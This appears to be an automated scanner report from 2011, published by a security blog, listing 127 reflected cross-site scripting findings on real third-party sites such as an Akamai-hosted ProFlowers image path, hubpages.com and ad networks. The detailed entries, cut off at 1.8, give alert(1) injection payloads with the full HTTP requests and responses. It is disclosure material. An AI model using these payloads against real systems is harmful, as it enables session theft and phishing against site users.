Ad CDN, XSS, Cross Site Scripting, CWE-79, Capec-86

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Report generated by XSS.CX Research Blog at Fri Feb 11 15:28:03 CST 2011.


The DORK Report


1. Cross-site scripting (reflected)

1.1. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ACC_spatrio_test [REST URL parameter 9]

1.2. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/AllinoneVDay_rbye11_4giftsnipe_PF [REST URL parameter 9]

1.3. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/CAR24vday_gv10_PF [REST URL parameter 9]

1.4. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/CHC_SCHC1005_RkmVdayHeartv2_VDY_FHB_11_PF [REST URL parameter 9]

1.5. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/CONR100_BRR10112_VDAY11_PF [REST URL parameter 9]

1.6. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/CONT315_BRR10006_VDAY11_PF [REST URL parameter 9]

1.7. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ContempoVase_tn [REST URL parameter 9]

1.8. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR10106_6Swizzle_VDY_11_PF [REST URL parameter 9]

1.9. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/Damask_AC [REST URL parameter 9]

1.10. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/GingerVase_tn [REST URL parameter 9]

1.11. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYassrtperu11_PF [REST URL parameter 9]

1.12. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQ15orchpurp10_PF [REST URL parameter 9]

1.13. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQallthefrills_dmsk11_PF [REST URL parameter 9]

1.14. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxhugskiss_rbyg10_PF [REST URL parameter 9]

1.15. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQgrowerschoice11_VdayPremiumFrills_PF [REST URL parameter 9]

1.16. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQhugskisses_rbye09_3_FREV_PF [REST URL parameter 9]

1.17. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQhugskisses_rbye11_PF [REST URL parameter 9]

1.18. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQithasitall_rbye10_PF [REST URL parameter 9]

1.19. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQjoyfulbouquet11_FC_PF [REST URL parameter 9]

1.20. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQjoyfulbouquet11_PF [REST URL parameter 9]

1.21. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQlittleallthefrills_gv11_PF [REST URL parameter 9]

1.22. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQmixedvdaycurly10_PF [REST URL parameter 9]

1.23. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQnewvdaybqt11_PF [REST URL parameter 9]

1.24. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQrosesalstro_dmsk11_PF [REST URL parameter 9]

1.25. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQshowersflowers_dmsk11_PF [REST URL parameter 9]

1.26. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQtruspec11_PF [REST URL parameter 9]

1.27. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQvdaytulipfreesia10_PF [REST URL parameter 9]

1.28. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORC3inrdphal_letitgrowmug10_PC1855_PF [REST URL parameter 9]

1.29. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inredrose_dkbsktrb09CAT_PF [REST URL parameter 9]

1.30. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6invdayros_redpot11_vdayheartpick_PC1844_PF [REST URL parameter 9]

1.31. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLThrtbmboo_redrocks10_PC1827_PF [REST URL parameter 9]

1.32. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12assrt50_rbye11_PF [REST URL parameter 9]

1.33. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12assrt_gv10_PF [REST URL parameter 9]

1.34. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12pink50_gv11_PF [REST URL parameter 9]

1.35. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12red40_rbye11_3_FV_PF [REST URL parameter 9]

1.36. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12red50_rbye11_FV_PF [REST URL parameter 9]

1.37. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12swtexp40nogyp_dmsk10_PF [REST URL parameter 9]

1.38. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12swtexp40nogyp_rbye10_FC_PF [REST URL parameter 9]

1.39. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12white50_09_l [REST URL parameter 9]

1.40. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS15assrtspray_rbye09_PF [REST URL parameter 9]

1.41. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS18red40_gv11_PF [REST URL parameter 9]

1.42. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24red40_rdtrmp09_PF [REST URL parameter 9]

1.43. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24red50_rbye11_FRV_PF [REST URL parameter 9]

1.44. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24red50_rbye11_PF [REST URL parameter 9]

1.45. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS36Red50_rbyg11_FRG_PF [REST URL parameter 9]

1.46. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS48assrtpet_gv09_PF [REST URL parameter 9]

1.47. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS_PAS_dynamite40_10_PF [REST URL parameter 9]

1.48. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/RubyVase_tn [REST URL parameter 9]

1.49. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SNK_CXNLOVECUD11_GvnLoveCud_EDY_11_PF [REST URL parameter 9]

1.50. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL15swthrt_gv09_2_FC_PF [REST URL parameter 9]

1.51. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL20assrt_dmsk11_PF [REST URL parameter 9]

1.52. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL20hol_dmsk11_PF [REST URL parameter 9]

1.53. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL20hol_rbye09CAT_FREV_PF [REST URL parameter 9]

1.54. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL20hol_sgv09_control_FC_PF [REST URL parameter 9]

1.55. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL20hol_sgv09_test_PF [REST URL parameter 9]

1.56. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL30sweetheart_rdtrmp09_2_PF [REST URL parameter 9]

1.57. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL30sweetheart_rdtrmp10_PF [REST URL parameter 9]

1.58. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/bearwithredbow09_SQ [REST URL parameter 9]

1.59. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/holidaychoc07_tn [REST URL parameter 9]

1.60. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]

1.61. http://api.facebook.com/restserver.php [method parameter]

1.62. http://api.facebook.com/restserver.php [urls parameter]

1.63. http://api.viglink.com/api/ping [key parameter]

1.64. http://b.scorecardresearch.com/beacon.js [c1 parameter]

1.65. http://b.scorecardresearch.com/beacon.js [c15 parameter]

1.66. http://b.scorecardresearch.com/beacon.js [c2 parameter]

1.67. http://b.scorecardresearch.com/beacon.js [c3 parameter]

1.68. http://b.scorecardresearch.com/beacon.js [c4 parameter]

1.69. http://b.scorecardresearch.com/beacon.js [c5 parameter]

1.70. http://b.scorecardresearch.com/beacon.js [c6 parameter]

1.71. http://copypasta.credibl.es/stylesheets/compiled/copypasta.css [REST URL parameter 2]

1.72. http://copypasta.credibl.es/stylesheets/compiled/copypasta.css [REST URL parameter 3]

1.73. http://digg.com/remote-submit [REST URL parameter 1]

1.74. http://digg.com/submit [REST URL parameter 1]

1.75. http://hubpages.com/ [name of an arbitrarily supplied request parameter]

1.76. http://hubpages.com/about/advertise [REST URL parameter 1]

1.77. http://hubpages.com/about/advertise [name of an arbitrarily supplied request parameter]

1.78. http://hubpages.com/hubs/hot/ [REST URL parameter 1]

1.79. http://hubpages.com/hubs/hot/ [name of an arbitrarily supplied request parameter]

1.80. http://hubpages.com/my/hubs/stats [REST URL parameter 1]

1.81. http://hubpages.com/my/hubs/stats [REST URL parameter 2]

1.82. http://hubpages.com/my/hubs/stats [REST URL parameter 3]

1.83. http://hubpages.com/signin/ [REST URL parameter 1]

1.84. http://hubpages.com/topics/ [REST URL parameter 1]

1.85. http://hubpages.com/topics/ [name of an arbitrarily supplied request parameter]

1.86. http://hubpages.com/tour/affiliate [REST URL parameter 1]

1.87. http://hubpages.com/tour/affiliate [REST URL parameter 2]

1.88. http://hubpages.com/tour/affiliate [name of an arbitrarily supplied request parameter]

1.89. http://hubpages.com/user/new/ [REST URL parameter 1]

1.90. http://hubpages.com/user/new/ [REST URL parameter 2]

1.91. http://hubpages.com/user/new/ [name of an arbitrarily supplied request parameter]

1.92. https://hubpages.com/signin/ [REST URL parameter 1]

1.93. https://hubpages.com/signin/ [REST URL parameter 1]

1.94. https://hubpages.com/signin/ [explain parameter]

1.95. https://hubpages.com/signin/ [explain parameter]

1.96. https://hubpages.com/signin/ [name of an arbitrarily supplied request parameter]

1.97. https://hubpages.com/signin/ [s parameter]

1.98. https://hubpages.com/signin/ [s parameter]

1.99. https://hubpages.com/signin/ [url parameter]

1.100. https://hubpages.com/signin/ [url parameter]

1.101. https://hubpages.com/signin/reset/ [REST URL parameter 1]

1.102. https://hubpages.com/signin/reset/ [REST URL parameter 1]

1.103. https://hubpages.com/signin/reset/ [REST URL parameter 2]

1.104. https://hubpages.com/signin/reset/ [REST URL parameter 2]

1.105. https://hubpages.com/signin/reset/ [name of an arbitrarily supplied request parameter]

1.106. http://img.mediaplex.com/content/0/10105/PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby.js [mpck parameter]

1.107. http://img.mediaplex.com/content/0/10105/PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby.js [mpvc parameter]

1.108. http://img.mediaplex.com/content/0/10105/PF_VDay11_300x250_DODStatus_VSpl_1Dznrr.html [mpck parameter]

1.109. http://img.mediaplex.com/content/0/10105/PF_VDay11_300x250_DODStatus_VSpl_1Dznrr.html [mpck parameter]

1.110. http://img.mediaplex.com/content/0/10105/PF_VDay11_300x250_DODStatus_VSpl_1Dznrr.html [mpvc parameter]

1.111. http://img.mediaplex.com/content/0/10105/PF_VDay11_300x250_DODStatus_VSpl_1Dznrr.html [mpvc parameter]

1.112. http://products.proflowers.com/flowers/18-Red-Roses-30050119 [ref parameter]

1.113. http://products.proflowers.com/flowers/18-Red-Roses-30050119 [trackingpgroup parameter]

1.114. http://products.proflowers.com/flowers/18-Red-Roses-30050119 [viewpos parameter]

1.115. http://products.proflowers.com/flowers/20-Sweetheart-Tulips-30007357 [Ref parameter]

1.116. http://products.proflowers.com/flowers/20-Sweetheart-Tulips-30007357 [trackingpgroup parameter]

1.117. http://products.proflowers.com/flowers/20-Sweetheart-Tulips-30007357 [viewpos parameter]

1.118. http://rover.ebay.com/idmap/0 [footer&cb parameter]

1.119. http://tags.bluekai.com/site/50 [phint parameter]

1.120. http://widgets.digg.com/buttons/count [url parameter]

1.121. http://www.floristexpress.net/ [refcode parameter]

1.122. http://www.pcworld.com/search.html [qt parameter]

1.123. http://www.pcworld.com/search.html [s parameter]

1.124. http://tags.bluekai.com/site/50 [Referer HTTP header]

1.125. http://products.proflowers.com/flowers/18-Red-Roses-30050119 [PFC_BrowserId cookie]

1.126. http://products.proflowers.com/flowers/20-Sweetheart-Tulips-30007357 [PFC_BrowserId cookie]

1.127. http://www.floristexpress.net/products/tulip_rainbow.htm [ref_code cookie]



1. Cross-site scripting (reflected)
There are 127 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous-looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.



1.1. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ACC_spatrio_test [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ACC_spatrio_test

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload d8888<img%20src%3da%20onerror%3dalert(1)>c39920fb3bf was submitted in the REST URL parameter 9. This input was echoed as d8888<img src=a onerror=alert(1)>c39920fb3bf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ACC_spatrio_testd8888<img%20src%3da%20onerror%3dalert(1)>c39920fb3bf?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=50&hei=50 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://products.proflowers.com/flowers/18-Red-Roses-30050119?viewpos=2&trackingpgroup=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 92
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:35:08 GMT
Connection: close

Unable to find /ProvideCommerce/ACC_spatrio_testd8888<img src=a onerror=alert(1)>c39920fb3bf

1.2. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/AllinoneVDay_rbye11_4giftsnipe_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/AllinoneVDay_rbye11_4giftsnipe_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload a0878<img%20src%3da%20onerror%3dalert(1)>06ac558497e was submitted in the REST URL parameter 9. This input was echoed as a0878<img src=a onerror=alert(1)>06ac558497e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/AllinoneVDay_rbye11_4giftsnipe_PFa0878<img%20src%3da%20onerror%3dalert(1)>06ac558497e?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 109
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:32:53 GMT
Connection: close

Unable to find /ProvideCommerce/AllinoneVDay_rbye11_4giftsnipe_PFa0878<img src=a onerror=alert(1)>06ac558497e

1.3. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/CAR24vday_gv10_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/CAR24vday_gv10_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload a5804<img%20src%3da%20onerror%3dalert(1)>df92fde2c2c was submitted in the REST URL parameter 9. This input was echoed as a5804<img src=a onerror=alert(1)>df92fde2c2c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/CAR24vday_gv10_PFa5804<img%20src%3da%20onerror%3dalert(1)>df92fde2c2c?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 93
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:33:07 GMT
Connection: close

Unable to find /ProvideCommerce/CAR24vday_gv10_PFa5804<img src=a onerror=alert(1)>df92fde2c2c

1.4. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/CHC_SCHC1005_RkmVdayHeartv2_VDY_FHB_11_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/CHC_SCHC1005_RkmVdayHeartv2_VDY_FHB_11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload a503d<img%20src%3da%20onerror%3dalert(1)>f24d80e0805 was submitted in the REST URL parameter 9. This input was echoed as a503d<img src=a onerror=alert(1)>f24d80e0805 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/CHC_SCHC1005_RkmVdayHeartv2_VDY_FHB_11_PFa503d<img%20src%3da%20onerror%3dalert(1)>f24d80e0805?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 117
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:32:55 GMT
Connection: close

Unable to find /ProvideCommerce/CHC_SCHC1005_RkmVdayHeartv2_VDY_FHB_11_PFa503d<img src=a onerror=alert(1)>f24d80e0805

1.5. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/CONR100_BRR10112_VDAY11_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/CONR100_BRR10112_VDAY11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 7a004<img%20src%3da%20onerror%3dalert(1)>e672d11766f was submitted in the REST URL parameter 9. This input was echoed as 7a004<img src=a onerror=alert(1)>e672d11766f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/CONR100_BRR10112_VDAY11_PF7a004<img%20src%3da%20onerror%3dalert(1)>e672d11766f?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 102
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:49:35 GMT
Connection: close

Unable to find /ProvideCommerce/CONR100_BRR10112_VDAY11_PF7a004<img src=a onerror=alert(1)>e672d11766f

1.6. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/CONT315_BRR10006_VDAY11_PF [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/CONT315_BRR10006_VDAY11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload aa1f8<img%20src%3da%20onerror%3dalert(1)>2379bea6731 was submitted in the REST URL parameter 9. This input was echoed as aa1f8<img src=a onerror=alert(1)>2379bea6731 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/CONT315_BRR10006_VDAY11_PFaa1f8<img%20src%3da%20onerror%3dalert(1)>2379bea6731?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/portalslanding.aspx?pageid=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr&Keyword=PF_VDAY11_300x250_DODControl_1Dznastchoc18rrHgsksRby_html&Network=MSN_com
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 102
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:33:06 GMT
Connection: close

Unable to find /ProvideCommerce/CONT315_BRR10006_VDAY11_PFaa1f8<img src=a onerror=alert(1)>2379bea6731

1.7. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ContempoVase_tn [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ContempoVase_tn

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 93aff<img%20src%3da%20onerror%3dalert(1)>e77f28a9ded was submitted in the REST URL parameter 9. This input was echoed as 93aff<img src=a onerror=alert(1)>e77f28a9ded in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ContempoVase_tn93aff<img%20src%3da%20onerror%3dalert(1)>e77f28a9ded?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&hei=73 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://products.proflowers.com/flowers/18-Red-Roses-30050119?viewpos=2&trackingpgroup=HIC&ref=fgvprtlsmsn_hp021111_Unknown_DODControl_1Dznastchoc18rr
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 91
Cache-Control: no-store
Date: Fri, 11 Feb 2011 18:35:06 GMT
Connection: close

Unable to find /ProvideCommerce/ContempoVase_tn93aff<img src=a onerror=alert(1)>e77f28a9ded

1.8. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR10106_6Swizzle_VDY_11_PF [REST URL parameter 9]

Summary
